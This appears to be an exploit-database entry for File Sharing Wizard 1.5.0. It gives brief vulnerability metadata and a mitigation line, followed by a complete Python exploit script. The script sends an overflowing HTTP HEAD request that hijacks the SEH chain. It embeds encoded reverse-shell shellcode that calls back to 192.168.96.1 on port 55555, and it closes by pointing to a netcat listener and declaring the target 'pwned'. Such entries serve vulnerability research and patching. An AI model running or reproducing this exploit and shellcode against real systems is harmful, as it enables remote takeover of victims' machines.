File Sharing Wizard Version 1.5.0 Remote Command Execution

vendor:

File Sharing Wizard

by:

b0nd

7,5

CVSS

HIGH

SEH Overwrite

119

CWE

Product Name: File Sharing Wizard

Affected Version From: 1.5.0

Affected Version To: 1.5.0

Patch Exists: YES

Related CWE: N/A

CPE: a:sharing-file:file_sharing_wizard

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2008

File Sharing Wizard Version 1.5.0 Remote Command Execution

The 'HEAD' command leads to SEH overwrite and ultimately remote system compromise. Tested on Windows XP SP2. SEH Overwrite and shellcode pointed out by EBP. Huge space for shellcode.

Mitigation:

Update to the latest version of File Sharing Wizard.

Source

Exploit-DB raw data:

#!/usr/bin/python


print "\n##########################################################"
print "##		Team Hackers Garage			##"
print "##		(www.garage4hackers.com)		##"
print "##							##"
print "##	File Sharing Wizard Version 1.5.0		##"
print "##		Remote Command Execution		##"
print "##       	 	Author: b0nd			##"
print "##		(sumit.iips@gmail.com)			##"
print "##                           				##"
print "##	Greetz to: The Hackers Garage Family		##"
print "##	Thanks to: www.exploit-db.com/author/m1k3/	##"
print "##							##"
print "##			&				##"
print "##							##"
print "##		corelanc0d3r (CORELAN TEAM)		##"
print "##							##"
print "###########################################################"


# http://www.sharing-file.net/
# File Sharing Wizard Version 1.5.0 build on 26-8-2008

# Summary: The "HEAD" command leads to SEH overwrite and ultimately remote system compromise
# Tested on: Windows XP SP2
# SEH Overwrite and shellcode pointed out by EBP
# Huge space for shellcode.


import socket
import sys

if len(sys.argv) < 2:
	print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>"
	sys.exit(1)

ips = sys.argv[1]
port = int(sys.argv[2])


string = "A"*1040
string += "\x90\x90\x1d\xeb"	# nSEH --> Jump to Shellcode
string += "\x29\xE3\xD3\x74"	# pop pop ret from oledlg.dll (SafeSEH OFF)
string += "\x90"*16		# Nop's

#win32_reverse -  EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */
#Thumb rule - Don't trust the shellcode ;)
string += ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" +
"\x4e\x56\x46\x42\x46\x32\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" +
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x48" +
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x53\x4b\x38" +
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" +
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" +
"\x46\x4f\x4b\x53\x46\x45\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x38" +
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x34" +
"\x4b\x58\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x48" +
"\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d" +
"\x46\x46\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48" +
"\x42\x47\x4e\x41\x4d\x4a\x4b\x38\x42\x54\x4a\x30\x50\x55\x4a\x36" +
"\x50\x58\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +
"\x43\x45\x48\x36\x4a\x36\x43\x43\x44\x53\x4a\x36\x47\x57\x43\x57" +
"\x44\x53\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" +
"\x4e\x4f\x4b\x43\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" +
"\x48\x56\x41\x38\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50" +
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" +
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x44\x43\x55" +
"\x43\x44\x43\x45\x4f\x4f\x42\x4d\x4a\x56\x42\x4c\x4a\x4a\x42\x56" +
"\x41\x50\x48\x56\x4a\x36\x49\x4d\x43\x50\x48\x36\x43\x45\x49\x38" +
"\x41\x4e\x45\x59\x4a\x46\x4e\x4e\x49\x4f\x4c\x4a\x42\x56\x47\x35" +
"\x4f\x4f\x48\x4d\x4c\x56\x42\x41\x41\x55\x45\x35\x4f\x4f\x42\x4d" +
"\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x46\x43\x36\x4d\x56\x4c\x46" +
"\x42\x55\x49\x35\x49\x52\x4e\x4c\x49\x58\x47\x4e\x4c\x36\x46\x54" +
"\x49\x58\x44\x4e\x41\x33\x42\x4c\x43\x4f\x4c\x4a\x45\x39\x49\x48" +
"\x4d\x4f\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x44\x4e\x52\x4d\x48" +
"\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36\x44\x57\x50\x4f" +
"\x43\x4b\x48\x41\x4f\x4f\x45\x57\x4a\x42\x4f\x4f\x48\x4d\x4b\x55" +
"\x47\x45\x44\x35\x41\x55\x41\x55\x41\x35\x4c\x46\x41\x30\x41\x45" +
"\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d" +
"\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f" +
"\x47\x53\x4f\x4f\x42\x4d\x4a\x56\x47\x4e\x49\x57\x48\x4c\x49\x47" +
"\x4f\x4f\x45\x57\x46\x50\x4f\x4f\x48\x4d\x4f\x4f\x47\x47\x4e\x4f" +
"\x4f\x4f\x42\x4d\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x45" +
"\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");

string += "D"*4000 # Some more junk

print "Launching remote BoF on", ips
print ""

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
	connect=s.connect((ips, port))
except:
	print "no connection possible"
	sys.exit(1)

print "\r\nsending payload"
print "..."

payload = (
'HEAD %s HTTP/1.0\r\n'
'\r\n') % (string)


s.send(payload)
s.close()

print "Check your netcat listening on TCP port 55555 for reverse connect shell\n"
print "%s pwned!" % (ips)